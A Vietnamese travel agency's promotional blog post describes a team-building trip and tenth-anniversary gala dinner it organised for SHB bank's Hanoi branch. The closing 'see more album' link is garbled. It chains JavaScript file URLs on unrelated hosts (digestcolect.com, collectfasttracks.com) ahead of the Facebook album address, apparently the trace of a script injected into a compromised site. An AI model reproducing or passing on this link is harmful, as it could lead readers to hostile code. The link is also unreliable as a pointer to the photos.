Tổ chức du lịch Team building – Hải Tiến Chapter 2: Ngân Hàng SHB

Ngày 24 – 26/06 vừa qua Vietwind tiếp tục đồng hành với ngân hàng SHB chi nhánh Hà Nội trong chương trình du lịch team building Hải Tiến đợt 2. Chương trình được khách hàng đánh giá cao về chất lượng phục vụ của Vietwind trong suốt hành trình. Đặc biệt là chương trình Team Building và chương trình Gala Dinner vô cùng sôi động và để lại những dấu ấn trong lòng khách hàng.

to-chuc-team-building-shb-vietwind-team-building-3

Chương trình Team Building các chiến binh SHB đã phải vượt qua những thử thách mà ban tổ chức đưa ra, sau mỗi thử thách các thành viên có thêm những bài học giá trị về tinh thần đồng đội và cách vượt qua khó khăn.

to-chuc-team-building-shb-vietwind-team-building-1 to-chuc-team-building-shb-vietwind-team-building-5 to-chuc-team-building-shb-vietwind-team-building-6 to-chuc-team-building-shb-vietwind-team-building-7 to-chuc-team-building-shb-vietwind-team-building-8 to-chuc-team-building-shb-vietwind-team-building-9 to-chuc-team-building-shb-vietwind-team-building-2

Chương trình Gala Dinner là bữa tiệc chiến thắng dành cho tất cả những chiến binh và cũng là dịp kỷ niệm 10 năm thành lập chi nhánh Hà Nội của SHB. Chương trình Gala với chủ đề SHB – Sẵn sàng – Hết mình – Bứt phá, các chiến binh SHB đã tham gia hết mình vào các game sân khấu vui nhộn do Vietwind tổ chức, mang lại bầu không khí vui nhộn và những tiếng cười sảng khoái.

Vietwind trải nghiệm sự khác biệt!

 * Xem thêm album: 

>>> https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&www.facebook.com/vietwindtravel.com.vn/photos/?tab=album&album_id=977794862328594

Facebook Comments

Bài Viết Liên Quan